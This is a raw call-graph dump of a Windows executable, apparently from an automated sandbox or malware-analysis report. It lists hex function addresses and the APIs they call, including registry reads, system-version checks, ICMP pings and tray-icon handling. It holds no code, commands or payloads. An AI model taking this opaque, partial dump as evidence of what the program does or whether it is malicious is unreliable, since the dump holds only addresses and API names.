521462 101961->102016 101965 521609 59 API calls 101963->101965 101968 521981 59 API calls 101964->101968 101969 530112 101965->101969 101966 53013a 101970 53014c 101966->101970 101972 521c9c 59 API calls 101966->101972 101967 56615b 101971 521821 59 API calls 101967->101971 101968->101959 101969->101961 101976 521462 59 API calls 101969->101976 101973 53015c 101970->101973 101977 521c9c 59 API calls 101970->101977 101991 566118 101971->101991 101972->101970 101975 530163 101973->101975 101978 521c9c 59 API calls 101973->101978 101974->101967 101981 566144 101974->101981 101986 5660c2 101974->101986 101979 521c9c 59 API calls 101975->101979 101988 53016a Mailbox 101975->101988 101976->101961 101977->101973 101978->101975 101979->101988 101980 521609 59 API calls 101980->101991 101981->101967 101983 56612f 101981->101983 101982 566120 101984 521821 59 API calls 101982->101984 101985 521821 59 API calls 101983->101985 101984->101991 101985->101991 101986->101982 101989 56610b 101986->101989 101988->101408 101990 521821 59 API calls 101989->101990 101990->101991 101991->101961 101991->101980 102029 52153b 59 API calls 2 library calls 101991->102029 101992->101454 101993->101454 101994->101454 101995->101454 101996->101454 101997->101454 101998->101454 102000 5242e8 101999->102000 102001 5242d9 101999->102001 102000->102001 102002 5242ed CloseHandle 102000->102002 102001->101433 102002->102001 102003->101378 102004->101383 102005->101410 102006->101462 102007->101462 102009 577719 102008->102009 102011 577750 102008->102011 102010 530f16 Mailbox 59 API calls 102009->102010 102009->102011 102010->102011 102011->101436 102012->101439 102013->101461 102014->101440 102015->101446 102017 521471 102016->102017 102018 5214ce 102016->102018 102017->102018 102020 52147c 102017->102020 102019 521981 59 API calls 102018->102019 102021 52149f _memmove 102019->102021 102022 521497 102020->102022 102023 55f15e 102020->102023 102021->101966 102030 521b7c 59 API calls Mailbox 102022->102030 102031 521c7e 102023->102031 102026 55f168 102027 530f16 Mailbox 59 API calls 102026->102027 102028 55f188 102027->102028 102029->101991 102030->102021 102032 530f16 Mailbox 59 API calls 102031->102032 102033 521c88 102032->102033 102033->102026 102039 579b72 __tzset_nolock _wcscmp 102034->102039 102035 579a06 102035->101470 102035->101498 102036 524ab2 74 API calls 102036->102039 102037 579531 GetSystemTimeAsFileTime 102037->102039 102038 524a8c 85 API calls 102038->102039 102039->102035 102039->102036 102039->102037 102039->102038 102040->101497 102042 535502 __setmbcp 102041->102042 102043 535516 102042->102043 102044 53552e 102042->102044 102054 538c88 58 API calls __getptd_noexit 102043->102054 102047 535526 __setmbcp 102044->102047 102048 536d6e __lock_file 59 API calls 102044->102048 102046 53551b 102055 538f16 9 API calls __cftoe2_l 102046->102055 102047->101524 102050 535540 102048->102050 102056 53548a 102050->102056 102054->102046 102055->102047 102057 535499 102056->102057 102058 5354ad 102056->102058 102073 538c88 58 API calls __getptd_noexit 102057->102073 102060 5354a9 102058->102060 102062 534b8d __flush 78 API calls 102058->102062 102072 535565 LeaveCriticalSection LeaveCriticalSection __wfsopen 102060->102072 102061 53549e 102074 538f16 9 API calls __cftoe2_l 102061->102074 102064 5354b9 102062->102064 102075 540cd7 102064->102075 102067 534836 __stbuf 58 API calls 102068 5354c7 102067->102068 102079 540b62 102068->102079 102070 5354cd 102070->102060 102071 532eb5 _free 58 API calls 102070->102071 102071->102060 102072->102047 102073->102061 102074->102060 102076 5354c1 102075->102076 102077 540ce4 102075->102077 102076->102067 102077->102076 102078 532eb5 _free 58 API calls 102077->102078 102078->102076 102080 540b6e __setmbcp 102079->102080 102081 540b92 102080->102081 102082 540b7b 102080->102082 102084 540c1d 102081->102084 102087 540ba2 102081->102087 102105 538c54 58 API calls __getptd_noexit 102082->102105 102134 538c54 58 API calls __getptd_noexit 102084->102134 102086 540b80 102106 538c88 58 API calls __getptd_noexit 102086->102106 102088 540bc0 102087->102088 102089 540bca 102087->102089 102107 538c54 58 API calls __getptd_noexit 102088->102107 102108 53d366 102089->102108 102090 540bc5 102135 538c88 58 API calls __getptd_noexit 102090->102135 102095 540bd0 102097 540be3 102095->102097 102098 540bee 102095->102098 102096 540c29 102136 538f16 9 API calls __cftoe2_l 102096->102136 102117 540c3d 102097->102117 102132 538c88 58 API calls __getptd_noexit 102098->102132 102101 540b87 __setmbcp 102101->102070 102103 540be9 102133 540c15 LeaveCriticalSection __unlock_fhandle 102103->102133 102105->102086 102106->102101 102107->102090 102109 53d372 __setmbcp 102108->102109 102110 53d3c1 EnterCriticalSection 102109->102110 102112 539d6b __lock 58 API calls 102109->102112 102111 53d3e7 __setmbcp 102110->102111 102111->102095 102113 53d397 102112->102113 102114 53d3af 102113->102114 102137 539f8b InitializeCriticalSectionAndSpinCount 102113->102137 102138 53d3eb LeaveCriticalSection _doexit 102114->102138 102139 53d623 102117->102139 102119 540ca1 102152 53d59d 59 API calls 2 library calls 102119->102152 102120 540c4b 102120->102119 102123 53d623 __lseek_nolock 58 API calls 102120->102123 102131 540c7f 102120->102131 102122 540ca9 102130 540ccb 102122->102130 102153 538c67 58 API calls 3 library calls 102122->102153 102125 540c76 102123->102125 102124 53d623 __lseek_nolock 58 API calls 102126 540c8b FindCloseChangeNotification 102124->102126 102128 53d623 __lseek_nolock 58 API calls 102125->102128 102126->102119 102129 540c97 GetLastError 102126->102129 102128->102131 102129->102119 102130->102103 102131->102119 102131->102124 102132->102103 102133->102101 102134->102090 102135->102096 102136->102101 102137->102114 102138->102110 102140 53d643 102139->102140 102141 53d62e 102139->102141 102144 538c54 __read 58 API calls 102140->102144 102146 53d668 102140->102146 102142 538c54 __read 58 API calls 102141->102142 102143 53d633 102142->102143 102145 538c88 ___libm_error_support 58 API calls 102143->102145 102147 53d672 102144->102147 102148 53d63b 102145->102148 102146->102120 102149 538c88 ___libm_error_support 58 API calls 102147->102149 102148->102120 102150 53d67a 102149->102150 102151 538f16 __cftoe2_l 9 API calls 102150->102151 102151->102148 102152->102122 102153->102130 102154->100945 102156 522cc7 102155->102156 102160 522ddb 102155->102160 102157 530f16 Mailbox 59 API calls 102156->102157 102156->102160 102159 522cee 102157->102159 102158 530f16 Mailbox 59 API calls 102165 522d63 102158->102165 102159->102158 102160->100949 102163 523297 59 API calls 102163->102165 102164 52343f 59 API calls 102164->102165 102165->102160 102165->102163 102165->102164 102168 5220e0 94 API calls 2 library calls 102165->102168 102169 566f3e 59 API calls Mailbox 102165->102169 102166->100951 102167->100953 102168->102165 102169->102165 102170->100968 102171->100967 102173 525810 102172->102173 102174 52581c 102172->102174 102173->100974 102206 57334a 62 API calls _W_store_winword 102173->102206 102174->102173 102175 525821 DestroyIcon 102174->102175 102175->102173 102206->100974 102215 5152c6 102214->102215 102217 515313 102214->102217 102216 5152d3 PeekMessageW 102215->102216 102215->102217 102216->102217 102218 5152ec 102216->102218 102217->102218 102220 54de98 TranslateAcceleratorW 102217->102220 102221 515352 TranslateMessage DispatchMessageW 102217->102221 102222 51533e PeekMessageW 102217->102222 102495 51359e 102217->102495 102218->101018 102220->102217 102220->102222 102221->102222 102222->102217 102222->102218 102224 519a31 102223->102224 102225 519a1d 102223->102225 102534 57a2fa 89 API calls 4 library calls 102224->102534 102500 5194e0 102225->102500 102229 5523a8 102229->102229 102231 519cb5 102230->102231 102232 5523ad 102231->102232 102234 519d1f 102231->102234 102245 519d79 102231->102245 102233 5153b0 290 API calls 102232->102233 102238 521207 59 API calls 102234->102238 102234->102245 102262 552c81 102261->102262 102265 51a84c 102261->102265 102606 57a2fa 89 API calls 4 library calls 102262->102606 102264 552c92 102264->101018 102266 552c9a 102265->102266 102273 51a888 _memmove 102265->102273 102269 530f16 59 API calls Mailbox 102269->102273 102270 552cde 102271 5153b0 290 API calls 102271->102273 102273->102269 102273->102270 102273->102271 102274 552cf8 102273->102274 102275 51a975 102273->102275 102276 51a962 102273->102276 102274->102275 102275->101018 102276->102275 102610 5747b7 GetFileAttributesW 102278->102610 102282 57bb62 102281->102282 102283 57bc28 Mailbox 102281->102283 102660 51502b 102282->102660 102285 514d37 84 API calls 102283->102285 102311 57bc30 Mailbox 102283->102311 102287 57bc60 102285->102287 102311->101018 102735 596389 102313->102735 102752 58cf8e 102320->102752 102324 514d37 84 API calls 102323->102324 102325 57c0f3 102324->102325 102890 523740 102330->102890 102916 5301ff 102372->102916 102392 5756ea 102391->102392 102393 575679 102391->102393 102392->101018 102394 57567b Sleep 102393->102394 102396 575684 QueryPerformanceCounter 102393->102396 102394->102392 102396->102394 102401->101018 102402->101018 102403->100993 102404->100993 102405->100993 102406->101018 102407->101018 102408->101018 102410 514d51 102409->102410 102422 514d4b 102409->102422 102411 54da58 __i64tow 102410->102411 102412 514d99 102410->102412 102414 514d57 __itow 102410->102414 102419 54d95f 102410->102419 102925 5337fa 83 API calls 4 library calls 102412->102925 102417 530f16 Mailbox 59 API calls 102414->102417 102415 54d9d7 Mailbox _wcscpy 102419->102415 102420 530f16 Mailbox 59 API calls 102419->102420 102422->101018 102427->101018 102428->101018 102430 54d2e1 102429->102430 102433 513a53 102429->102433 102431 54d2f1 102430->102431 102935 566afa 59 API calls 102430->102935 102434 513a7d 102433->102434 102439 513a9a Mailbox 102433->102439 102927 513b31 102433->102927 102439->101018 102440->101032 102441->101032 102442->101032 102444 58c148 102443->102444 102445 58c162 102443->102445 102959 57a2fa 89 API calls 4 library calls 102444->102959 102936 58a6c5 102445->102936 102483->101018 102484->101032 103072 574b4f 102485->103072 102496 5135e2 102495->102496 102496->102217 102534->102229 102606->102264 102611 573f9e 102610->102611 102612 5747d2 FindFirstFileW 102610->102612 102611->101018 102612->102611 102613 5747e7 FindClose 102612->102613 102613->102611 102661 515041 102660->102661 102662 51503c 102660->102662 102662->102661 102741 516de9 102735->102741 102742 51523c 59 API calls 102741->102742 102753 514d37 84 API calls 102752->102753 102891 52374f 102890->102891 102894 52376a 102890->102894 102919 53020a 102916->102919 102925->102414 102928 513b3f 102927->102928 102934 513b67 102927->102934 102934->102434 102935->102431 102937 58a738 102936->102937 102938 58a6e0 102936->102938 103093 533397 __setmbcp 103092->103093 103094 539d6b __lock 51 API calls 103093->103094 103095 53339e 103094->103095 103096 5333cc DecodePointer 103095->103096 103099 533457 __cinit 103095->103099 103098 5333e3 DecodePointer 103096->103098 103096->103099 103105 5333f3 103098->103105 103112 5334a5 103099->103112 103101 5334b4 __setmbcp 103101->100629 103103 533400 EncodePointer 103103->103105 103104 53349c 103106 533201 __mtinitlocknum 3 API calls 103104->103106 103105->103099 103105->103103 103107 533410 DecodePointer EncodePointer 103105->103107 103108 5334a5 103106->103108 103110 533422 DecodePointer DecodePointer 103107->103110 103109 5334b2 103108->103109 103117 539ed5 LeaveCriticalSection 103108->103117 103109->100629 103110->103105 103113 533485 103112->103113 103114 5334ab 103112->103114 103113->103101 103116 539ed5 LeaveCriticalSection 103113->103116 103118 539ed5 LeaveCriticalSection 103114->103118 103116->103104 103117->103109 103118->103113 103119 579135 103120 579142 103119->103120 103121 579148 103119->103121 103122 532eb5 _free 58 API calls 103120->103122 103123 532eb5 _free 58 API calls 103121->103123 103125 579159 103121->103125 103122->103121 103123->103125 103124 532eb5 _free 58 API calls 103126 57916b 103124->103126 103125->103124 103125->103126 103127 511055 103132 512a19 103127->103132 103130 532ea0 __cinit 67 API calls 103131 511064 103130->103131 103133 521207 59 API calls 103132->103133 103134 512a87 103133->103134 103139 511256 103134->103139 103137 512b24 103138 51105a 103137->103138 103142 5113c7 59 API calls 2 library calls 103137->103142 103138->103130 103143 511284 103139->103143 103142->103137 103144 511291 103143->103144 103145 511275 103143->103145 103144->103145 103146 511298 RegOpenKeyExW 103144->103146 103145->103137 103146->103145 103147 5112b2 RegQueryValueExW 103146->103147 103148 5112e8 RegCloseKey 103147->103148 103149 5112d3 103147->103149 103148->103145 103149->103148 103150 515ff5 103174 515ede Mailbox _memmove 103150->103174 103151 530f16 59 API calls Mailbox 103151->103174 103152 516a9b 103285 51a9de 290 API calls 103152->103285 103154 5153b0 290 API calls 103154->103174 103155 54ef29 103156 515190 Mailbox 59 API calls 103155->103156 103161 54ef1b 103156->103161 103157 54ef37 103298 57a2fa 89 API calls 4 library calls 103157->103298 103206 515569 Mailbox 103161->103206 103297 566ad4 59 API calls Mailbox 103161->103297 103162 5160e5 103163 54e067 103162->103163 103166 5163bd Mailbox 103162->103166 103175 516abc 103162->103175 103193 516152 Mailbox 103162->103193 103163->103166 103286 567890 59 API calls 103163->103286 103165 521c9c 59 API calls 103165->103174 103167 530f16 Mailbox 59 API calls 103166->103167 103171 5163d1 103167->103171 103168 521a36 59 API calls 103168->103174 103169 51523c 59 API calls 103169->103174 103173 5163de 103171->103173 103171->103175 103172 58c11d 290 API calls 103172->103174 103176 516413 103173->103176 103177 54e0a2 103173->103177 103174->103151 103174->103152 103174->103154 103174->103155 103174->103157 103174->103162 103174->103165 103174->103168 103174->103169 103174->103172 103174->103175 103174->103206 103289 577d7e 59 API calls Mailbox 103174->103289 103290 566ad4 59 API calls Mailbox 103174->103290 103296 57a2fa 89 API calls 4 library calls 103175->103296 103181 516426 103176->103181 103207 515447 Mailbox 103176->103207 103287 58c644 85 API calls 2 library calls 103177->103287 103288 58c791 95 API calls Mailbox 103181->103288 103183 54e0cd 103183->103183 103184 54f095 103300 57a2fa 89 API calls 4 library calls 103184->103300 103185 54e5c1 103293 57a2fa 89 API calls 4 library calls 103185->103293 103186 515190 Mailbox 59 API calls 103186->103193 103187 516e30 60 API calls 103187->103207 103188 5169fa 103197 521c9c 59 API calls 103188->103197 103190 530f16 59 API calls Mailbox 103190->103207 103192 5169ff 103192->103184 103192->103185 103193->103161 103193->103175 103193->103186 103193->103206 103212 58ef7a 91 API calls 103193->103212 103218 58e3d4 130 API calls 103193->103218 103219 51cfd7 103193->103219 103238 585be2 103193->103238 103263 58ea30 103193->103263 103271 58e982 103193->103271 103277 5863b3 103193->103277 103291 5141c4 59 API calls Mailbox 103193->103291 103292 567890 59 API calls 103193->103292 103194 521c9c 59 API calls 103194->103207 103195 54e5d0 103197->103206 103198 54e9ca 103200 521c9c 59 API calls 103198->103200 103200->103206 103202 521207 59 API calls 103202->103207 103203 567890 59 API calls 103203->103207 103204 54ea97 103204->103206 103294 567890 59 API calls 103204->103294 103207->103185 103207->103187 103207->103188 103207->103190 103207->103192 103207->103194 103207->103198 103207->103202 103207->103203 103207->103204 103207->103206 103208 532ea0 67 API calls __cinit 103207->103208 103209 54ee58 103207->103209 103211 515a1a 103207->103211 103284 517e50 290 API calls 2 library calls 103207->103284 103208->103207 103295 57a2fa 89 API calls 4 library calls 103209->103295 103299 57a2fa 89 API calls 4 library calls 103211->103299 103212->103193 103218->103193 103220 514d37 84 API calls 103219->103220 103221 51d001 103220->103221 103301 515278 103221->103301 103223 51d018 103224 51d57b 103223->103224 103225 51502b 59 API calls 103223->103225 103233 51d439 Mailbox __NMSG_WRITE 103223->103233 103224->103193 103225->103233 103226 53305f _W_store_winword 60 API calls 103226->103233 103227 52162d 59 API calls 103227->103233 103228 530b90 62 API calls 103228->103233 103230 514f98 59 API calls 103230->103233 103232 514d37 84 API calls 103232->103233 103233->103224 103233->103226 103233->103227 103233->103228 103233->103230 103233->103232 103234 521821 59 API calls 103233->103234 103235 5259d3 94 API calls 103233->103235 103236 525ac3 Shell_NotifyIconW 103233->103236 103237 51502b 59 API calls 103233->103237 103306 52153b 59 API calls 2 library calls 103233->103306 103307 514f3c 59 API calls Mailbox 103233->103307 103234->103233 103235->103233 103236->103233 103237->103233 103239 585c0b 103238->103239 103240 585c39 WSAStartup 103239->103240 103242 51502b 59 API calls 103239->103242 103241 585c62 103240->103241 103262 585c4d Mailbox 103240->103262 103308 5240cd 103241->103308 103244 585c26 103242->103244 103244->103240 103247 51502b 59 API calls 103244->103247 103246 514d37 84 API calls 103248 585c77 103246->103248 103249 585c35 103247->103249 103313 52402a WideCharToMultiByte 103248->103313 103249->103240 103251 585c84 inet_addr gethostbyname 103252 585ca2 IcmpCreateFile 103251->103252 103251->103262 103253 585cc6 103252->103253 103252->103262 103254 530f16 Mailbox 59 API calls 103253->103254 103255 585cdf 103254->103255 103256 52433f 59 API calls 103255->103256 103257 585cea 103256->103257 103258 585cf9 IcmpSendEcho 103257->103258 103259 585d1a IcmpSendEcho 103257->103259 103261 585d32 103258->103261 103259->103261 103260 585d99 IcmpCloseHandle WSACleanup 103260->103262 103261->103260 103262->103193 103264 58ea73 103263->103264 103267 58ea4c 103263->103267 103265 58ea95 103264->103265 103268 51502b 59 API calls 103264->103268 103266 51502b 59 API calls 103265->103266 103265->103267 103269 58ead9 103265->103269 103266->103269 103267->103193 103268->103265 103323 576669 103269->103323 103272 58e995 103271->103272 103273 514d37 84 API calls 103272->103273 103276 58e9a4 103272->103276 103274 58e9d2 103273->103274 103385 577b51 103274->103385 103276->103193 103278 51502b 59 API calls 103277->103278 103279 5863c9 103278->103279 103280 5863e9 103279->103280 103281 51502b 59 API calls 103279->103281 103282 58640a 103280->103282 103283 51523c 59 API calls 103280->103283 103281->103280 103282->103193 103283->103282 103284->103207 103285->103175 103286->103166 103287->103181 103288->103183 103289->103174 103290->103174 103291->103193 103292->103193 103293->103195 103294->103206 103295->103211 103296->103161 103297->103206 103298->103161 103299->103206 103300->103206 103302 530f16 Mailbox 59 API calls 103301->103302 103303 515285 103302->103303 103304 515294 103303->103304 103305 521a36 59 API calls 103303->103305 103304->103223 103305->103304 103306->103233 103307->103233 103309 530f16 Mailbox 59 API calls 103308->103309 103310 5240e0 103309->103310 103311 521c7e 59 API calls 103310->103311 103312 5240ed 103311->103312 103312->103246 103314 524085 103313->103314 103315 52404e 103313->103315 103322 523f20 59 API calls Mailbox 103314->103322 103316 530f16 Mailbox 59 API calls 103315->103316 103318 524055 WideCharToMultiByte 103316->103318 103321 523f79 59 API calls 2 library calls 103318->103321 103320 524077 103320->103251 103321->103320 103322->103320 103326 576685 103323->103326 103325 576680 103325->103267 103359 5765a2 103326->103359 103329 576706 103375 5768e0 89 API calls 2 library calls 103329->103375 103330 57671e 103332 57678e 103330->103332 103335 576784 103330->103335 103340 576737 103330->103340 103333 5767be 103332->103333 103334 57680c 103332->103334 103356 5766aa _memmove 103332->103356 103338 5767c3 103333->103338 103339 5767de 103333->103339 103336 5768a7 103334->103336 103337 576813 103334->103337 103335->103332 103341 57676b 103335->103341 103336->103356 103384 5150d5 59 API calls 103336->103384 103342 576816 103337->103342 103343 576889 103337->103343 103338->103356 103379 515087 59 API calls 103338->103379 103339->103356 103380 515087 59 API calls 103339->103380 103376 578b3d 61 API calls 103340->103376 103366 577aec 103341->103366 103348 576852 103342->103348 103349 57681a 103342->103349 103343->103356 103383 5150d5 59 API calls 103343->103383 103348->103356 103382 5150d5 59 API calls 103348->103382 103349->103356 103381 5150d5 59 API calls 103349->103381 103353 57673f 103377 578b3d 61 API calls 103353->103377 103356->103325 103357 576756 _memmove 103378 578b3d 61 API calls 103357->103378 103360 5765f2 103359->103360 103364 5765b3 103359->103364 103361 51502b 59 API calls 103360->103361 103362 5765f0 103361->103362 103362->103329 103362->103330 103362->103356 103363 514d37 84 API calls 103363->103364 103364->103362 103364->103363 103365 53305f _W_store_winword 60 API calls 103364->103365 103365->103364 103367 577af7 103366->103367 103368 530f16 Mailbox 59 API calls 103367->103368 103369 577afe 103368->103369 103370 577b2b 103369->103370 103371 577b0a 103369->103371 103372 530f16 Mailbox 59 API calls 103370->103372 103373 530f16 Mailbox 59 API calls 103371->103373 103374 577b13 _memset 103372->103374 103373->103374 103374->103356 103375->103356 103376->103353 103377->103357 103378->103341 103379->103356 103380->103356 103381->103356 103382->103356 103383->103356 103384->103356 103386 577b5e 103385->103386 103387 530f16 Mailbox 59 API calls 103386->103387 103388 577b65 103387->103388 103391 575fa2 103388->103391 103390 577ba8 Mailbox 103390->103276 103392 521aa4 59 API calls 103391->103392 103393 575fb5 CharLowerBuffW 103392->103393 103399 575fc8 103393->103399 103394 521609 59 API calls 103394->103399 103395 576002 103396 576014 103395->103396 103397 521609 59 API calls 103395->103397 103398 530f16 Mailbox 59 API calls 103396->103398 103397->103396 103402 576042 103398->103402 103399->103394 103399->103395 103408 575fd2 _memset Mailbox 103399->103408 103403 576061 103402->103403 103424 575ede 59 API calls 103402->103424 103409 5760ff 103403->103409 103404 5760a0 103405 530f16 Mailbox 59 API calls 103404->103405 103404->103408 103406 5760ba 103405->103406 103407 530f16 Mailbox 59 API calls 103406->103407 103407->103408 103408->103390 103410 521207 59 API calls 103409->103410 103411 576131 103410->103411 103412 521207 59 API calls 103411->103412 103413 57613a 103412->103413 103414 521207 59 API calls 103413->103414 103420 576143 _wcscmp 103414->103420 103415 521821 59 API calls 103415->103420 103416 533768 GetStringTypeW 103416->103420 103417 52153b 59 API calls 103417->103420 103419 5336ec 59 API calls 103419->103420 103420->103415 103420->103416 103420->103417 103420->103419 103421 5760ff 60 API calls 103420->103421 103422 576418 Mailbox 103420->103422 103423 521c9c 59 API calls 103420->103423 103425 53378e GetStringTypeW _iswctype 103420->103425 103421->103420 103422->103404 103423->103420 103424->103402 103425->103420 103426 517357 103427 517360 103426->103427 103430 5178f5 103426->103430 103428 514d37 84 API calls 103427->103428 103427->103430 103429 51738b 103428->103429 103429->103430 103431 51739b 103429->103431 103436 516fdb Mailbox 103430->103436 103437 5685dc 59 API calls _memmove 103430->103437 103433 521680 59 API calls 103431->103433 103433->103436 103434 54f84b 103435 521c9c 59 API calls 103434->103435 103435->103436 103437->103434 103438 511016 103443 525ce7 103438->103443 103441 532ea0 __cinit 67 API calls 103442 511025 103441->103442 103444 530f16 Mailbox 59 API calls 103443->103444 103445 525cef 103444->103445 103446 51101b 103445->103446 103450 525f39 103445->103450 103446->103441 103451 525f42 103450->103451 103452 525cfb 103450->103452 103453 532ea0 __cinit 67 API calls 103451->103453 103454 525d13 103452->103454 103453->103452 103455 521207 59 API calls 103454->103455 103456 525d2b GetVersionExW 103455->103456 103457 521821 59 API calls 103456->103457 103458 525d6e 103457->103458 103459 521981 59 API calls 103458->103459 103462 525d9b 103458->103462 103460 525d8f 103459->103460 103461 52133d 59 API calls 103460->103461 103461->103462 103463 525e00 GetCurrentProcess IsWow64Process 103462->103463 103465 561018 103462->103465 103464 525e19 103463->103464 103466 525e98 GetSystemInfo 103464->103466 103467 525e2f 103464->103467 103468 525e65 103466->103468 103478 5255f0 103467->103478 103468->103446 103471 525e41 103474 5255f0 2 API calls 103471->103474 103472 525e8c GetSystemInfo 103473 525e56 103472->103473 103473->103468 103476 525e5c FreeLibrary 103473->103476 103475 525e49 GetNativeSystemInfo 103474->103475 103475->103473 103476->103468 103479 525619 103478->103479 103480 5255f9 LoadLibraryA 103478->103480 103479->103471 103479->103472 103480->103479 103481 52560a GetProcAddress 103480->103481 103481->103479 103482 54e393 103494 51373a 103482->103494 103484 54e3a9 103485 54e3bf 103484->103485 103487 54e42a 103484->103487 103503 515376 60 API calls 103485->103503 103488 51b020 290 API calls 103487->103488 103493 54e41e Mailbox 103488->103493 103490 54e3fe 103490->103493 103504 578777 59 API calls Mailbox 103490->103504 103491 54ef76 Mailbox 103493->103491 103505 57a2fa 89 API calls 4 library calls 103493->103505 103495 513746 103494->103495 103496 513758 103494->103496 103497 51523c 59 API calls 103495->103497 103498 513787 103496->103498 103499 51375e 103496->103499 103502 513750 103497->103502 103500 51523c 59 API calls 103498->103500 103501 530f16 Mailbox 59 API calls 103499->103501 103500->103502 103501->103502 103502->103484 103503->103490 103504->103493 103505->103491 103506 54b6dd 103509 51ad98 103506->103509 103510 552e93 DestroyWindow 103509->103510 103511 51add7 mciSendStringW 103509->103511 103522 552e9f 103510->103522 103512 51afc0 103511->103512 103513 51adf3 103511->103513 103512->103513 103514 51afcf UnregisterHotKey 103512->103514 103515 51ae01 103513->103515 103513->103522 103514->103512 103543 51c71f 103515->103543 103517 552ee4 103523 552ef7 FreeLibrary 103517->103523 103524 552f08 103517->103524 103519 552ebd FindClose 103519->103522 103520 5242cf CloseHandle 103520->103522 103521 51ae16 103521->103524 103529 51ae24 103521->103529 103522->103517 103522->103519 103522->103520 103523->103517 103525 552f1c VirtualFree 103524->103525 103532 51ae91 103524->103532 103525->103524 103526 51ae80 OleUninitialize 103526->103532 103527 552f63 103533 552f72 103527->103533 103549 57a0ad CloseHandle 103527->103549 103528 51ae9c 103530 51aeac Mailbox 103528->103530 103529->103526 103547 52fe1c 61 API calls Mailbox 103530->103547 103532->103527 103532->103528 103538 552f86 103533->103538 103550 56d3ae 59 API calls Mailbox 103533->103550 103535 51aec2 Mailbox 103548 53045a 59 API calls Mailbox 103535->103548 103544 51c72e Mailbox 103543->103544 103545 51ae08 103544->103545 103551 56de8d 59 API calls 103544->103551 103545->103517 103545->103521 103547->103535 103549->103527 103550->103533 103551->103544 103552 51107d 103557 522fc5 103552->103557 103554 51108c 103555 532ea0 __cinit 67 API calls 103554->103555 103556 511096 103555->103556 103558 522fd5 __ftell_nolock 103557->103558 103559 521207 59 API calls 103558->103559 103560 52308b 103559->103560 103561 52fffa 61 API calls 103560->103561 103562 523094 103561->103562 103588 5307ec 103562->103588 103565 521900 59 API calls 103566 5230ad 103565->103566 103567 524c94 59 API calls 103566->103567 103568 5230bc 103567->103568 103569 521207 59 API calls 103568->103569 103570 5230c5 103569->103570 103571 5219e1 59 API calls 103570->103571 103572 5230ce RegOpenKeyExW 103571->103572 103573 560123 RegQueryValueExW 103572->103573 103577 5230f0 Mailbox 103572->103577 103574 5601b5 RegCloseKey 103573->103574 103575 560140 103573->103575 103574->103577 103587 5601c7 _wcscat Mailbox __NMSG_WRITE 103574->103587 103576 530f16 Mailbox 59 API calls 103575->103576 103578 560159 103576->103578 103577->103554 103580 52433f 59 API calls 103578->103580 103579 521609 59 API calls 103579->103587 103581 560164 RegQueryValueExW 103580->103581 103582 560181 103581->103582 103584 56019b 103581->103584 103583 521821 59 API calls 103582->103583 103583->103584 103584->103574 103585 521a36 59 API calls 103585->103587 103586 524c94 59 API calls 103586->103587 103587->103577 103587->103579 103587->103585 103587->103586 103589 541aa0 __ftell_nolock 103588->103589 103590 5307f9 GetFullPathNameW 103589->103590 103591 53081b 103590->103591 103592 521821 59 API calls 103591->103592 103593 52309f 103592->103593 103593->103565 103594 524d83 103595 524dba 103594->103595 103596 524e37 103595->103596 103597 524dd8 103595->103597 103634 524e35 103595->103634 103598 560942 103596->103598 103599 524e3d 103596->103599 103600 524de5 103597->103600 103601 524ead PostQuitMessage 103597->103601 103607 51c460 10 API calls 103598->103607 103603 524e42 103599->103603 103604 524e65 SetTimer RegisterWindowMessageW 103599->103604 103605 524df0 103600->103605 103606 5609b5 103600->103606 103608 524e28 103601->103608 103602 524e1a DefWindowProcW 103602->103608 103609 5608e5 103603->103609 103610 524e49 KillTimer 103603->103610 103604->103608 103611 524e8e CreatePopupMenu 103604->103611 103612 524eb7 103605->103612 103613 524df8 103605->103613 103649 572b3a 97 API calls _memset 103606->103649 103615 560969 103607->103615 103616 56091e MoveWindow 103609->103616 103617 5608ea 103609->103617 103618 525ac3 Shell_NotifyIconW 103610->103618 103611->103608 103639 525b29 103612->103639 103619 524e03 103613->103619 103620 56099a 103613->103620 103622 51c483 290 API calls 103615->103622 103616->103608 103624 5608ee 103617->103624 103625 56090d SetFocus 103617->103625 103626 524e5c 103618->103626 103627 524e9b 103619->103627 103628 524e0e 103619->103628 103620->103602 103648 568637 59 API calls Mailbox 103620->103648 103621 5609c7 103621->103602 103621->103608 103622->103628 103624->103628 103629 5608f7 103624->103629 103625->103608 103646 5134e4 DeleteObject DestroyWindow Mailbox 103626->103646 103647 525bd7 107 API calls _memset 103627->103647 103628->103602 103636 525ac3 Shell_NotifyIconW 103628->103636 103633 51c460 10 API calls 103629->103633 103633->103608 103634->103602 103635 524eab 103635->103608 103637 56098e 103636->103637 103638 5259d3 94 API calls 103637->103638 103638->103634 103640 525bc2 103639->103640 103641 525b40 _memset 103639->103641 103640->103608 103642 5256f8 87 API calls 103641->103642 103644 525b67 103642->103644 103643 525bab KillTimer SetTimer 103643->103640 103644->103643 103645 560cee Shell_NotifyIconW 103644->103645 103645->103643 103646->103608 103647->103635 103648->103634 103649->103621 103650 511066 103655 51aaaa 103650->103655 103652 51106c 103653 532ea0 __cinit 67 API calls 103652->103653 103654 511076 103653->103654 103656 51aacb 103655->103656 103688 530216 103656->103688 103660 51ab12 103661 521207 59 API calls 103660->103661 103662 51ab1c 103661->103662 103663 521207 59 API calls 103662->103663 103664 51ab26 103663->103664 103665 521207 59 API calls 103664->103665 103666 51ab30 103665->103666 103667 521207 59 API calls 103666->103667 103668 51ab6e 103667->103668 103669 521207 59 API calls 103668->103669 103670 51ac39 103669->103670 103698 5304b3 103670->103698 103674 51ac6b 103675 521207 59 API calls 103674->103675 103676 51ac75 103675->103676 103726 52fd56 103676->103726 103678 51acbc 103679 51accc GetStdHandle 103678->103679 103680 51ad18 103679->103680 103681 552e69 103679->103681 103682 51ad20 OleInitialize 103680->103682 103681->103680 103683 552e72 103681->103683 103682->103652 103733 576f60 64 API calls Mailbox 103683->103733 103685 552e79 103734 57762f CreateThread 103685->103734 103687 552e85 CloseHandle 103687->103682 103735 5302ef 103688->103735 103691 5302ef 59 API calls 103692 530258 103691->103692 103693 521207 59 API calls 103692->103693 103694 530264 103693->103694 103695 521821 59 API calls 103694->103695 103696 51aad1 103695->103696 103697 5306e6 6 API calls 103696->103697 103697->103660 103699 521207 59 API calls 103698->103699 103700 5304c3 103699->103700 103701 521207 59 API calls 103700->103701 103702 5304cb 103701->103702 103742 5210c3 103702->103742 103705 5210c3 59 API calls 103706 5304db 103705->103706 103707 521207 59 API calls 103706->103707 103708 5304e6 103707->103708 103709 530f16 Mailbox 59 API calls 103708->103709 103710 51ac43 103709->103710 103711 52fe77 103710->103711 103712 52fe85 103711->103712 103713 521207 59 API calls 103712->103713 103714 52fe90 103713->103714 103715 521207 59 API calls 103714->103715 103716 52fe9b 